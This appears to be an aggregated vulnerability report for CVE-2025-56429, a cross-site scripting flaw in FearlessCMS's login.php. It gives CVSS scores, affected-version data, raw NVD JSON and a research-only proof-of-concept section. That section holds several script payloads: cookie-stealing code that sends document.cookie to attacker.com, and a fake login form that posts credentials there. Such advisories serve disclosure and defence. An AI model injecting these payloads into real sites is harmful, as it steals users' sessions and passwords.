Security Vulnerability Report
中文
CVE-2025-56429 CVSS 6.1 MEDIUM

CVE-2025-56429

Published: 2025-12-10 19:16:14
Last Modified: 2025-12-18 20:16:03
Source: [email protected]

Description

Cross Site Scripting vulnerability in Fearless Geek Media FearlessCMS v.0.0.2-15 allows a remote attacker to obtain sensitive information via the login.php component.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fearlessgeekmedia:fearlesscms:0.0.2-15:*:*:*:*:*:*:* - VULNERABLE
FearlessCMS v.0.0.2-15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-56429 XSS PoC for FearlessCMS login.php --> <!-- Attack Vector: Inject malicious JavaScript through login form fields --> <!-- PoC 1: Basic Alert Payload --> <script>alert('XSS CVE-2025-56429')</script> <!-- PoC 2: Cookie Stealing Payload --> <script> document.write('<img src="http://attacker.com/steal?cookie='+document.cookie+'"/>'); </script> <!-- PoC 3: Session Hijacking Payload --> <script> var xhr = new XMLHttpRequest(); xhr.open('GET', 'https://attacker.com/log?data='+btoa(document.cookie), true); xhr.send(); </script> <!-- PoC 4: Phishing Payload --> <script> if(document.location.pathname.indexOf('login')!=-1){ document.body.innerHTML='<h1>Session Expired</h1><form action="https://attacker.com/phish"><input name="username"><input name="password"><button>Login</button></form>'; } </script> <!-- Usage: Inject one of the above payloads into login.php input fields (username/password) -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56429", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:14.027", "lastModified": "2025-12-18T20:16:02.827", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site Scripting vulnerability in Fearless Geek Media FearlessCMS v.0.0.2-15 allows a remote attacker to obtain sensitive information via the login.php component."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fearlessgeekmedia:fearlesscms:0.0.2-15:*:*:*:*:*:*:*", "matchCriteriaId": "B0B297A2-30E7-4B05-9DC1-E81B9B163229"}]}]}], "references": [{"url": "https://github.com/fearlessgeekmedia/FearlessCMS/issues/36", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/fearlessgeekmedia/FearlessCMS/issues/36", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.